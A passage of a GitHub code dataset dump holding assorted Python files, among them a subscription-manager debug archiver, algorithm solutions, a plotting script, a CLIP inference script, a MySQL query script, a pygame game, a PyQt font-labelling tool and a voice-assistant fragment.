self._copy_cert_directory(conf[\"rhsm\"][\"productCertDir\"], content_path)\n\n if defaults[\"entitlementcertdir\"] != conf[\"rhsm\"][\"entitlementCertDir\"] or not sos:\n self._copy_cert_directory(conf[\"rhsm\"][\"entitlementCertDir\"], content_path)\n\n if defaults[\"consumercertdir\"] != conf[\"rhsm\"][\"consumerCertDir\"] or not sos:\n self._copy_cert_directory(conf[\"rhsm\"][\"consumerCertDir\"], content_path)\n\n # If ca_cert_dir and pluginconfdif are configured as subdirs of /etc/rhsm\n # (as is the default) we will have already copied there contents,\n # so ignore directory exists errors\n try:\n if defaults[\"ca_cert_dir\"] != conf[\"rhsm\"][\"ca_cert_dir\"] or not sos:\n self._copy_cert_directory(conf[\"rhsm\"][\"ca_cert_dir\"], content_path)\n except EnvironmentError as e:\n if e.errno != errno.EEXIST:\n raise\n\n try:\n if defaults[\"pluginconfdir\"] != conf[\"rhsm\"][\"pluginconfdir\"] or not sos:\n self._copy_directory(conf[\"rhsm\"][\"pluginconfdir\"], content_path)\n except EnvironmentError as e:\n if e.errno != errno.EEXIST:\n raise\n\n # build an archive by default\n if self.options.archive:\n try:\n tf = tarfile.open(tar_file_path, \"w:gz\")\n tf.add(content_path, archive_name)\n finally:\n tf.close()\n\n final_path = os.path.join(self.options.destination, \"rhsm-debug-system-%s.tar.gz\" % code)\n\n self.final_destination_path = final_path\n\n sfm = SaferFileMove()\n sfm.move(tar_file_path, final_path)\n print(_(\"Wrote: {final_path}\").format(final_path=final_path))\n else:\n # NOTE: this will fail across filesystems. We could add a force\n # flag to for creation of a specific name with approriate\n # warnings.\n dest_dir_name = os.path.join(self.options.destination, archive_name)\n\n # create the dest dir, and set it's perms, this is atomic ish\n self._makedir(dest_dir_name)\n\n # try to rename the dir atomically\n # rename only works on the same filesystem, but it is atomic.\n os.rename(content_path, dest_dir_name)\n\n print(_(\"Wrote: {destination_dir_name}\").format(destination_dir_name=dest_dir_name))\n\n except Exception as e:\n handle_exception(_(\"Unable to create zip file of system information: {error}\").format(error=e), e)\n sys.exit(os.EX_SOFTWARE)\n finally:\n if content_path and os.path.isdir(content_path):\n shutil.rmtree(content_path, True)\n\n def _make_code(self):\n return datetime.now().strftime(\"%Y%m%d-%f\")\n\n def _get_version_info(self):\n return {\n \"server type\": self.server_versions[\"server-type\"],\n \"subscription management server\": self.server_versions[\"candlepin\"],\n \"subscription-manager\": self.client_versions[\"subscription-manager\"],\n }\n\n def _write_flat_file(self, content_path, filename, content):\n path = os.path.join(content_path, filename)\n with open(path, \"w+\") as fo:\n fo.write(json.dumps(content, indent=4, sort_keys=True, default=json.encode))\n\n def _copy_directory(self, src_path, dest_path, ignore_pats=[]):\n rel_path = src_path\n if os.path.isabs(src_path):\n rel_path = src_path[1:]\n if ignore_pats is not None:\n shutil.copytree(src_path, os.path.join(dest_path, rel_path), ignore=ignore_patterns(*ignore_pats))\n else:\n shutil.copytree(src_path, os.path.join(dest_path, rel_path))\n\n def _copy_cert_directory(self, src_path, dest_path):\n self._copy_directory(src_path, dest_path, KEY_IGNORE_PATS)\n\n def _makedir(self, dest_dir_name):\n os.makedirs(dest_dir_name, ROOT_READ_ONLY_DIR)\n\n\nclass SaferFileMove:\n \"\"\"Try to copy a file avoiding race conditions.\n\n Opens the dest file os.O_RDWR | os.O_CREAT | os.O_EXCL, which\n guarantees that the file didn't exist before, that we created it,\n and that we are the only process that has it open. We also make sure\n the perms are so that only root can read the result.\n\n Then we copy the contents of the src file to the new dest file,\n and unlink the src file.\"\"\"\n\n def __init__(self):\n # based on shutils copyfileob\n self.buf_size = 16 * 1024\n # only root can read\n self.default_perms = ROOT_READ_ONLY_FILE\n\n def move(self, src, dest):\n \"\"\"Move a file to a dest dir, potentially /tmp more safely.\n\n If dest is /tmp, or a specific name in /tmp, we want to\n create it excl if we can.\"\"\"\n with open(src, \"rb\") as src_fo:\n # if dest doesn't exist, and we can open it excl, then open it,\n # keep the fd, create a file object for it, and write to it\n with self._open_excl(dest) as dest_fo:\n self._copyfileobj(src_fo, dest_fo)\n\n os.unlink(src)\n\n def _open_excl(self, path):\n \"\"\"Return a file object that we know we created and nothing else owns.\"\"\"\n return os.fdopen(os.open(path, os.O_RDWR | os.O_CREAT | os.O_EXCL, self.default_perms), \"wb+\")\n\n def _copyfileobj(self, src_fo, dest_fo):\n while True:\n buf = src_fo.read(self.buf_size)\n if not buf:\n break\n dest_fo.write(buf)\n","repo_name":"candlepin/subscription-manager","sub_path":"src/rhsm_debug/debug_commands.py","file_name":"debug_commands.py","file_ext":"py","file_size_in_byte":12132,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"18"} +{"seq_id":"75234003239","text":"import sys\nimport heapq\ninput = sys.stdin.readline\n####################################################\nn, k = map(int, input().split())\n\njam = []\n\nfor _ in range(n):\n heapq.heappush(jam, list(map(int, input().split())))\n\nbag = []\nfor _ in range(k):\n bag.append(int(input()))\n\nbag.sort()\n####################################################\nresult = 0\n\ncan_input_jam = []\nfor max_m in bag:\n for _ in jam:\n if jam[0][0] > max_m:\n break\n heapq.heappush(can_input_jam, -heapq.heappop(jam)[1])\n\n if can_input_jam:\n result -= heapq.heappop(can_input_jam)\n\n elif not jam:\n break\n\nprint(result)\n","repo_name":"Sunghyun1320/algorithm","sub_path":"python/BOJ/before_study_ssafy/num1202.py","file_name":"num1202.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33699273858","text":"# Import the necessary modules\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport numpy as np\nimport numpy.ma as ma\nimport pandas as pd\nimport sys\n\n# Initialize the lists for X and Y\ntry:\n app = sys.argv[1]\nexcept:\n print('Usage: plot_bar.py ')\n exit(1)\n\nmean_outlier = 50\ntry:\n data = pd.read_csv(f\"../ufs-weather-model/{app}-prtime.csv\")\nexcept:\n print(f\"Invalid app or .csv dataset not available for 'f{app}'\")\n exit(1)\n\ndf = pd.DataFrame(data)\n\nx = list(df.iloc[:, 0])\ny = list(df.iloc[:, 2])\npr = list(df.iloc[:, 1])\n\ny_ = np.array(y)\ny_mean = np.mean(ma.masked_where(y_ > mean_outlier, y_))\nprint(y_mean)\n\nfig, ax = plt.subplots(1, 1)\nax.bar(x, y, width=0.5)\nplt.text(20, y_.max(), f\"Mean = {y_mean:.2f} days\", fontsize=8)\nax.set_xticks(x)\n# Set ticks labels for x-axis\nax.set_xticklabels(pr, rotation=60, fontsize=6)\ntick_spacing = 3\nax.xaxis.set_major_locator(ticker.MultipleLocator(tick_spacing))\nax.yaxis.set_major_locator(ticker.MultipleLocator(10))\n# Show the plot\nax.invert_xaxis()\nplt.title(f\"{app.upper()} PR Turnaround Time\")\nplt.xlabel(\"Pull Requests\")\nplt.ylabel(\"Days\")\nplt.tight_layout()\n\nplt.savefig(f\"../ufs-weather-model/{app}-prtime.png\")\nplt.show()\n","repo_name":"NOAA-EPIC/UFS-PR-metrics","sub_path":"script/plot_bar.py","file_name":"plot_bar.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18802710218","text":"import torch, torchvision\nimport torch.nn.functional as F\nfrom transformers import AutoProcessor, AutoModel\nfrom preprocess import JsonToDataset, MultimodalDataset, get_data_loader\n\n# paths\npaths = {\n ## dataset & image path\n \"train_path\": \"/kovar-vol/kovar/dataset/train.json\",\n \"test_path\": \"/kovar-vol/kovar/dataset/test.json\",\n \"image_path\": \"/kovar-vol/images\",\n } \n\n# model_checkpoint = \"openai/clip-vit-base-patch32\"\nmodel_checkpoint = \"koclip/koclip-base-pt\"\nprocessor = AutoProcessor.from_pretrained(model_checkpoint)\nmodel = AutoModel.from_pretrained(model_checkpoint)\n\n\nresize_and_normalize = torchvision.transforms.Compose([\n torchvision.transforms.Resize((224, 224)), ## refernece: https://github.com/openai/CLIP/issues/248, https://github.com/openai/CLIP/issues/69\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(mean = [0.485, 0.456, 0.406], std = [0.229, 0.224, 0.225]), ## mean & std value are convention calculated from ImageNet.\n torchvision.transforms.ToPILImage(), ## CLIP model got image input in the type of not tensor but PIL.Image\n ])\n\n\nif __name__ == \"__main__\":\n \n get_dataset = JsonToDataset()\n # train_set = get_dataset(paths[\"train_path\"])\n test_set = get_dataset(paths[\"test_path\"])\n\n batch_size = 8\n\n test_set = MultimodalDataset(test_set, transforms=None)\n test_loader = get_data_loader(test_set, batch_size)\n\n num_correct = 0\n for batched_inputs, labels in test_loader:\n outputs = model(**batched_inputs)\n logits_per_image = outputs['logits_per_image']\n \n ## 1) get proper outputs from 4*12 tensor by proper indexing\n indices = torch.arange(logits_per_image.shape[1]).reshape(batch_size,3) ## indices: torch.tensor([[0, 1, 2],[3,4,5],[6,7,8],[9,10,11]])\n logits_per_image = torch.gather(input=logits_per_image,dim= 1, index = indices)\n\n # print(logits_per_image)\n \n ## 2) convert logits_per_image outputs into one-hot like \n one_hot_outputs = F.one_hot(logits_per_image.argmax(dim=1), num_classes=3).detach().numpy()\n \n ## 3) calculate the right outpus comparing to labels\n num_correct_in_batch = (one_hot_outputs == labels).all(axis=1).sum()\n print(num_correct)\n num_correct += num_correct_in_batch\n print(num_correct_in_batch, num_correct)\n \n print(f'accuracy: {num_correct / len(test_set)}')\n \n ","repo_name":"Jongbin-kr/COSE474_Deep-Learning","sub_path":"Final-Project/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"14175374992","text":"#!/usr/bin/python3\n\"\"\"\nLists the names of cities in a specified state from,\nthe 'hbtn_0e_0_usa' database.\n\"\"\"\nimport MySQLdb\nimport sys\n\nif __name__ == \"__main__\":\n # Establish a database connection\n db = MySQLdb.connect(\n host=\"localhost\",\n user=sys.argv[1],\n passwd=sys.argv[2],\n db=sys.argv[3],\n port=3306\n )\n\n # Create a cursor\n cur = db.cursor()\n\n # Execute the query\n state_name = sys.argv[4]\n query = \"\"\"\n SELECT cities.name\n FROM cities\n INNER JOIN states ON states.id = cities.state_id\n WHERE states.name = %s\n \"\"\"\n cur.execute(query, (state_name,))\n\n # Fetch and process results\n rows = cur.fetchall()\n city_names = [row[0] for row in rows]\n print(\", \".join(city_names))\n\n # Close the cursor and database connection\n cur.close()\n db.close()\n","repo_name":"yvechemtai/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/5-filter_cities.py","file_name":"5-filter_cities.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"44952455944","text":"# Project : SDE Placement Questions\n# Filename : squares_of_a_sorted_array.py\n# Author : thameem\n# Created time : Wed, 5 Jan 2022 at 11:46 PM India Standard Time\n# Last modified time : Wed, 5 Jan 2022 at 11:46 PM India Standard Time\nfrom beartype import beartype\n\n\nclass SquaresOfASortedArray:\n @beartype\n def __init__(self: 'SquaresOfASortedArray', nums: list[int]) -> None:\n # conventional method\n for index, num in enumerate(nums):\n nums[index] = num * num\n nums.sort()\n self.result = nums\n\n\nif __name__ == '__main__':\n res = SquaresOfASortedArray(nums=[-4, -1, 0, 3, 10])\n print(res.result)\n","repo_name":"thameemk/SDE-PlacementQuestions","sub_path":"Two Pointers/Squares of a Sorted Array/squares_of_a_sorted_array.py","file_name":"squares_of_a_sorted_array.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"72160086760","text":"import random\ndef create_app(l: list):\n s = lambda l: sorted(l)\n l = s(l)\n\n def append(v):\n l.append(v)\n\n def set_sort(sorter):\n nonlocal s\n s = sorter\n\n def sort():\n nonlocal l\n l = s(l)\n\n def get():\n nonlocal l\n return l\n\n return append, set_sort, sort, get\n \nappend, set_sort, sort, get = create_app([1,2,3,4])\n\nsort()\nprint(get())\n\nset_sort(lambda x: sorted(x, reverse=True))\nsort()\nprint(get())\n\nset_sort(lambda x: sorted(x, key=lambda _: random.random()))\nsort()\nprint(get())","repo_name":"istaqom/tugas-pemrograman-fungsional","sub_path":"tugas kelompok/behavioral/strategy.py","file_name":"strategy.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7962892711","text":"class Solution:\n def arrayChange(self, nums: List[int], operations: List[List[int]]) -> List[int]:\n d = defaultdict(int)\n for id, val in enumerate(nums):\n d[val] = id\n \n\n for i in operations:\n nums[d[i[0]]] = i[1]\n d[i[1]] = d[i[0]]\n \n return nums","repo_name":"Mahisami/A2SV-competitive-programming-","sub_path":"leet-code-solutions/replace-elements-in-an-array.py","file_name":"replace-elements-in-an-array.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11799023532","text":"import pygame\n\n\npygame.init()\n\n\nscreen_width = 600\nscreen_height = 800\nscreen = pygame.display.set_mode((screen_width, screen_height))\n\n\npygame.display.set_caption(\"Space Raiders\")\n\n\nplayer_x = 300\nplayer_y = 700\nplayer_speed = 5\n\n\nenemy_x = 50\nenemy_y = 50\nenemy_speed = 2\n\n\nrunning = True\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT]:\n player_x -= player_speed\n if keys[pygame.K_RIGHT]:\n player_x += player_speed\n\n\n enemy_x += enemy_speed\n if enemy_x > screen_width or enemy_x < 0:\n enemy_speed = -enemy_speed\n\n screen.fill((0, 0, 0))\n\n\n pygame.draw.rect(screen, (255, 255, 255), (player_x, player_y, 50, 50))\n\n\n pygame.draw.rect(screen, (255, 0, 0), (enemy_x, enemy_y, 50, 50))\n\n\n pygame.display.update()\n\n\npygame.quit()\n","repo_name":"mgrady03/Marys_SpaceRaiders","sub_path":"spaceRaiders.py","file_name":"spaceRaiders.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32002911515","text":"from keras.models import load_model \nfrom keras.models import model_from_json \n\nimport numpy as np \nimport pandas as pd \nfrom sklearn.model_selection import train_test_split\n\n#(6)LOAD DATA FROM NUMPY(.NPZ FILE) ARRAYS\na_npz = np.load(\"..\\\\input\\\\a_images_arrays.npz\")\na = a_npz['arr_0']\n\nb_npz = np.load(\"..\\\\input\\\\b_labels.npz\")\nb = b_npz['arr_0'] \n\n\n#(7)SPLIT DATASET (70% TRAINING, 10% FOR VALIDATION AND 20% TESTING)\n#dataset split ratio problem got solved by setting parameter from 'test_size' to 'train_size' since trainset will\n#sice trainset will be split again into train and validation sets \n#First split dataset into train(80%) and test(20%) \nA_train, A_test, b_train, b_test = train_test_split(a, b, test_size = 0.2, random_state = 1, stratify = b)\n#From train, split it again into train(70%) and validation(10%) \nA_train, A_val, b_train, b_val = train_test_split(A_train, b_train, train_size = 0.875, random_state = 1, stratify = b_train)\nprint(np.array(A_train).shape)\nprint(np.array(A_val).shape)\nprint(np.array(A_test).shape)\n\n\nnew_model = load_model(\"modelk.h5\")\n\n\n#score: evaluation of a loss function in test set\n#force kears model to display probability by dividng image array by 255.0\nscore, accuracy = new_model.evaluate(A_test/255.0,\n\t\t\t\t b_test)\nprint('Test Score:', score) \nprint('Test Accuracy:', accuracy)\n\n#print(new_model.predict_classes(A_test))\n#print(new_model.predict_proba(A_test))\n\n\n\n","repo_name":"khinmaunghtay4ah/lung-chestxray-classification","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"41925920703","text":"'''\nhttps://leetcode.com/problems/number-of-1-bits/\nWrite a function that takes an unsigned integer and returns the number of '1' bits it has (also known as the Hamming weight).\nExample 1:\nInput: n = 00000000000000000000000000001011\nOutput: 3\nExplanation: The input binary string 00000000000000000000000000001011 has a total of three '1' bits.\n'''\n'''\nTime:O(1)\nSpace:O(1)\n'''\nclass Solution:\n def hammingWeight(self, n: int) -> int:\n res = 0\n for i in range(32):\n if n & 1:\n res += 1\n n = n>>1\n return res\n \nclass Solution:\n def hammingWeight(self, n: int) -> int:\n count = 0\n mask = 1\n for _ in range(32):\n if n&mask:\n count += 1\n mask <<= 1\n return count\n","repo_name":"MJJ919/My-Leetcode-Records","sub_path":"191. Number of 1 Bits.py","file_name":"191. Number of 1 Bits.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38921333200","text":"# -*- coding: utf-8 -*-\r\nimport yaml\r\nimport redis\r\n\r\nconfig = {\r\n 'host': '127.0.0.1',\r\n 'port': 6379,\r\n 'db': 0,\r\n 'pwd': '123456654'\r\n}\r\n\r\ndef connect(node=None):\r\n return interRedis(node).getRds()\r\n \r\nclass interRedis():\r\n\r\n def __init__(self, node):\r\n conf = getConfig(node)\r\n self.rds = redis.Redis(conf['host'], conf['port'], conf['db'], decode_responses=True, password=conf.get('pwd'))\r\n\r\n def getRds(self):\r\n return self.rds\r\n\r\ndef getConfig(node):\r\n if not node:\r\n return config\r\n yamlFile = open('./commLib/redis.yaml', encoding='utf8')\r\n _conf = yaml.load(yamlFile)\r\n config.update(_conf.get(node, {}))\r\n return config\r\n\r\n# if __name__ == '__main__':\r\n# r = connect('osu2')\r\n# r1 = r.setex('tt',1,30)\r\n# r1 = r.get('tt')\r\n# print(r1)","repo_name":"huhuibin147/interbotAPI","sub_path":"commLib/interRedis.py","file_name":"interRedis.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"18"} +{"seq_id":"19407080760","text":"import sys\nsys.path.append(\"../ml_pipeline\")\n\nimport torch\nimport random\nfrom image_classes import classes\nfrom datetime import datetime\nfrom matplotlib import pyplot\nfrom torch import nn\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets \nfrom torchvision.transforms import ToTensor\nfrom device import device\nfrom neural_network import NeuralNetwork\n\n#######################################\n############### Load ##################\n#######################################\n\n# Get training data from open datasets\n# This downloads the raw data into a the directory /data/FashionMNIST/raw\n# Performs a transformation on 28x28 images to Tensors\n# Automatically \ntraining_data = datasets.FashionMNIST(\n root=\"data\", # directory where data should be downloaded to on local\n train=True, # if True, uses training data set of 60K images, False uses 10K set of test data images\n download=True, # if True downloades from internet, False only fetches from local\n transform=ToTensor() # converts image data to Tensor (multi-dimensional matrix)\n)\n\n# Get test data from open datasets\ntest_data = datasets.FashionMNIST(\n root=\"data\",\n train=False,\n download=True,\n transform=ToTensor(),\n)\n\n# Utilize a data loader to iterate over datasets\nbatch_size = 128 # defines the number of samples processed per iteration\n\ntraining_dl = DataLoader(training_data, batch_size=batch_size)\ntest_dl = DataLoader(test_data, batch_size=batch_size)\n\n# print 1 batch of data for debugging\n# X: input example with dimensions [N, C, H, W]\n# N: number of samples\n# C: count of images per item samples\n# H: height of image (in pixels)\n# W: widgth of image (in pixels)\n# N: number of samples\n# y: label of sample with dimensions [N]\nfor X, y in training_dl:\n print(f\"Shape of input example 'X' [N, C, H, W]: {X.shape}-{X.dtype}\")\n print(f\"Shape of label example 'y' [N]: {y.shape}-{y.dtype}\")\n break\n\n# Show what some of the images look like\nfor i in range(9):\n # define subplot\n pyplot.subplot(330 + 1 + i)\n # plot raw pixel data\n pyplot.imshow(training_data[i][0][0], cmap=pyplot.get_cmap('gray'))\n# show the figure\npyplot.show()\n\n#######################################\n############### Train #################\n#######################################\n\n# Get cpu, gpu or mps device for training.\nprint(f\"Using {device} device\")\n\n# Utilize a data loader to iterate over datasets\nbatch_size = 128 # defines the number of samples processed per iteration\n\ntraining_dl = DataLoader(training_data, batch_size=batch_size)\nfor X, y in training_dl:\n print(f\"Shape of input example 'X' [N, C, H, W]: {X.shape}-{X.dtype}\")\n print(f\"Shape of label example 'y' [N]: {y.shape}-{y.dtype}\")\n break\n\n# Define model using:\n# Model => NeuralNetwork\n# Loss Function => Cross Entropy Loss (see https://365datascience.com/tutorials/machine-learning-tutorials/cross-entropy-loss/)\n# Optimizer => Stochastic Gradient Descent (see https://www.geeksforgeeks.org/ml-stochastic-gradient-descent-sgd/)\n# - has a learning rate (how large of a jump to take in the direction of the gradient)\n# - backpropagation is the way in which loss is passed backwards against the gradients of the loss in the network\nmodel = NeuralNetwork().to(device)\nloss_fn = nn.CrossEntropyLoss()\noptimizer = torch.optim.SGD(model.parameters(), lr=1e-2)\n\n# Run training epochs\nepochs = 10 # epoch is a full run over the data\nfor t in range(epochs):\n print(f'Epoch {t+1}\\n---------------------------')\n model.train() # sets the model to training mode\n size = len(training_dl.dataset)\n\n # Walk over training data in batches\n for batch, (X, y) in enumerate(training_dl):\n X, y = X.to(device), y.to(device)\n\n # Compute prediction error\n pred = model(X)\n loss = loss_fn(pred, y)\n\n # Backpropagation\n loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n\n loss, current = loss.item(), (batch + 1) * len(X)\n print(f\"loss: {loss:>7f} [{current:>5d}/{size:>5d}]\")\n\n#######################################\n############### Test ##################\n#######################################\n\n# Load test data into DataLoader\ntest_dl = DataLoader(test_data, batch_size=batch_size)\nfor X, y in test_dl:\n print(f\"Shape of input example 'X' [N, C, H, W]: {X.shape}-{X.dtype}\")\n print(f\"Shape of label example 'y' [N]: {y.shape}-{y.dtype}\")\n break\n\nsize = len(test_dl.dataset)\nnum_batches = len(test_dl)\nmodel.eval()\nloss_fn = nn.CrossEntropyLoss()\ntest_loss, correct = 0, 0\nwith torch.no_grad():\n for X, y in test_dl:\n X, y = X.to(device), y.to(device)\n pred = model(X)\n test_loss += loss_fn(pred, y).item()\n correct += (pred.argmax(1) == y).type(torch.float).sum().item()\ntest_loss /= num_batches\ncorrect /= size\nprint(f\"Test Error: \\n Accuracy: {(100*correct):>0.1f}%, Avg loss: {test_loss:>8f} \\n\")\n\n# look at some of the predictions\nfor idx in range(9):\n # define subplot\n pyplot.subplot(330 + 1 + idx)\n # plot raw pixel data, get random value\n i = random.randint(0, len(test_data)-1)\n pyplot.imshow(test_data[i][0][0], cmap=pyplot.get_cmap('gray'))\n # prediction\n x, y = test_data[i][0], test_data[i][1]\n with torch.no_grad():\n x = x.to(device)\n pred = model(x)\n predicted, actual = classes[pred[0].argmax(0)], classes[y]\n print(f'Predicted: \"{predicted}\", Actual: \"{actual}\"')\n pyplot.title(f'Predicted: \"{predicted}\", Actual: \"{actual}\"')\n\n# show the figure\npyplot.show()","repo_name":"dweinshenker/airflow_ml_pipeline_tutorial","sub_path":"dags/ml_pipeline/v1/ml_pipeline.py","file_name":"ml_pipeline.py","file_ext":"py","file_size_in_byte":5547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13836531832","text":"from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QGridLayout, QListWidget, QLabel, QSlider, QPushButton\nfrom PyQt5.QtGui import QPixmap, QKeySequence\nfrom PyQt5.QtCore import Qt\n\nfrom PIL import ImageFont, ImageDraw, Image, ImageQt\nfrom glob import glob\nimport os\nimport yaml\nfrom functools import partial\nimport copy\nimport sys\n\nclass Labeltool(QWidget):\n\n def __init__(self):\n super().__init__()\n\n self.label_file = '00_labels.yaml'\n self.font_types = ['*.otf', '*.ttf']\n self.font_dir = 'C:/Users/Schnee/Datasets/Fonts01CleanUp/'\n\n self.fonts = []\n for type in self.font_types:\n self.fonts.extend(glob(self.font_dir + type))\n\n self.current_row = 0\n self.current_font = os.path.basename(self.fonts[self.current_row])\n\n self.slider_steps = 20\n\n self.label_names = ['Weight', 'Width', 'Contrast', 'Serifs', 'Italic', 'Roundness']\n self.labels = dict()\n\n self.label_cache = [0.0] * len(self.label_names)\n\n if not os.path.exists(self.font_dir + self.label_file):\n for font in self.fonts:\n filename = os.path.basename(font)\n self.labels[filename] = [0.0] * len(self.label_names)\n\n with open(self.font_dir + self.label_file, 'w') as f:\n yaml.dump(self.labels, f)\n\n else:\n with open(self.font_dir + self.label_file) as f:\n self.labels = yaml.load(f, Loader=yaml.FullLoader)\n\n self.init_UI()\n\n def init_UI(self):\n self.layout = QHBoxLayout()\n\n self.layout_left = QVBoxLayout()\n self.layout_right = QVBoxLayout()\n\n self.layout.addLayout(self.layout_left)\n self.layout.addLayout(self.layout_right)\n\n self.font_list = QListWidget()\n self.caption = QLabel()\n self.font_view = QLabel()\n\n self.btn_prev = QPushButton('Prev (Left Arrow Key)')\n self.btn_next = QPushButton('Next (Right Arrow Key)')\n self.btn_copy = QPushButton('Copy Labels (Ctrl+C)')\n self.btn_paste = QPushButton('Paste Labels (Ctrl+V)')\n self.btn_save = QPushButton('Save (Ctrl+S)')\n\n self.slider_captions = [QLabel() for _ in range(len(self.label_names))]\n self.sliders = [QSlider(Qt.Horizontal) for _ in range(len(self.label_names))]\n\n self.layout_left.addWidget(self.font_list)\n\n self.layout_right.addWidget(self.caption)\n self.layout_right.addWidget(self.font_view)\n\n self.layout_sliders = QGridLayout()\n\n for i in range(len(self.label_names)):\n self.slider_captions[i].setText(self.label_names[i])\n self.sliders[i].setTickPosition(QSlider.TicksBelow)\n self.sliders[i].setTickInterval(2)\n self.layout_sliders.addWidget(self.slider_captions[i], i, 0)\n self.layout_sliders.addWidget(self.sliders[i], i, 1)\n\n self.layout_right.addLayout(self.layout_sliders)\n\n layout_btns = QHBoxLayout()\n\n layout_btns.addWidget(self.btn_prev)\n layout_btns.addWidget(self.btn_next)\n layout_btns.addWidget(self.btn_copy)\n layout_btns.addWidget(self.btn_paste)\n layout_btns.addWidget(self.btn_save)\n\n self.layout_right.addLayout(layout_btns)\n\n for font in self.fonts:\n filename = os.path.basename(font)\n self.font_list.addItem(filename)\n\n self.font_list.itemActivated.connect(self.select_font)\n\n self.btn_next.clicked.connect(self.next_font)\n self.btn_prev.clicked.connect(self.prev_font)\n self.btn_copy.clicked.connect(self.copy_label)\n self.btn_paste.clicked.connect(self.paste_label)\n self.btn_save.clicked.connect(self.save_labels)\n\n self.btn_next.setShortcut(QKeySequence('Right'))\n self.btn_prev.setShortcut(QKeySequence('Left'))\n self.btn_copy.setShortcut(QKeySequence('Ctrl+C'))\n self.btn_paste.setShortcut(QKeySequence('Ctrl+V'))\n self.btn_save.setShortcut(QKeySequence('Ctrl+S'))\n\n for i in range(len(self.sliders)):\n self.sliders[i].setMinimum(-self.slider_steps)\n self.sliders[i].setMaximum(self.slider_steps)\n self.sliders[i].valueChanged.connect(partial(self.slider_changed, i))\n\n self.select_font(self.font_list.item(self.current_row))\n\n self.setWindowTitle('Labeltool')\n self.setLayout(self.layout)\n self.show()\n\n def next_font(self):\n self.current_row = (self.current_row + 1) % (len(self.fonts))\n font = self.font_list.item(self.current_row)\n self.set_sample_text(self.font_dir + font.text())\n\n def prev_font(self):\n self.current_row = (self.current_row - 1) % (len(self.fonts))\n font = self.font_list.item(self.current_row)\n self.set_sample_text(self.font_dir + font.text())\n\n def select_font(self, font):\n self.current_row = self.font_list.currentRow()\n self.set_sample_text(self.font_dir + font.text())\n\n def set_sample_text(self, font, sample_text=\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\\nabcdefghijklmnopqrstuvwxyz .,-!?/\", im_size=(1200,200), txt_size=55):\n self.current_font = os.path.basename(font)\n self.update_caption()\n font = ImageFont.truetype(font, txt_size)\n im = Image.new('L', (im_size[0], im_size[1]), 0)\n draw = ImageDraw.Draw(im)\n _, h = draw.textsize(sample_text, font=font)\n draw.text((20, im_size[1]/2-h/2), sample_text, font=font, fill='#FFF')\n\n q_img = ImageQt.ImageQt(im)\n q_pix = QPixmap.fromImage(q_img)\n self.font_view.setPixmap(q_pix)\n\n for i, slider in enumerate(self.sliders):\n slider.setValue(self.labels[self.current_font][i] * self.slider_steps)\n\n def slider_changed(self, i):\n self.labels[self.current_font][i] = self.sliders[i].value() / self.slider_steps\n self.update_caption()\n\n def update_caption(self):\n self.caption.setText(f'Font {self.current_row+1} of {len(self.fonts)}. Current font: {self.current_font}. Labels: {self.labels[self.current_font]}')\n\n def save_labels(self):\n with open(self.font_dir + self.label_file, 'w') as f:\n yaml.dump(self.labels, f)\n\n def copy_label(self):\n self.label_cache = copy.copy(self.labels[self.current_font])\n\n def paste_label(self):\n self.labels[self.current_font] = copy.copy(self.label_cache)\n\n for i, slider in enumerate(self.sliders):\n slider.setValue(self.labels[self.current_font][i] * self.slider_steps)\n\ndef main():\n app = QApplication([])\n labeltool = Labeltool()\n sys.exit(app.exec_())\n\nif __name__ == '__main__':\n main()","repo_name":"sanic-the-hedgefond/conditional-PGAN","sub_path":"labeltool/labeltool.py","file_name":"labeltool.py","file_ext":"py","file_size_in_byte":6683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12025559191","text":"import datetime\nimport pywhatkit\nimport wikipedia\nimport webbrowser\nfrom weather import *\nfrom speak import *\nfrom send_email import *\nfrom notepad import *\n\n\n\ndef run_chad():\n command = take_command()\n if 'play' in command:\n song = command.replace('play', '')\n speak('Now playing ' + song)\n pywhatkit.playonyt(song)\n elif 'time' in command:\n time = datetime.datetime.now().strftime('%I:%M %p')\n print(time)\n speak('The time is now ' + time)\n elif 'date' in command:\n date = datetime.datetime.now().strftime('%A,%d %B, %Y')\n print(date)\n speak(\"Today's date is 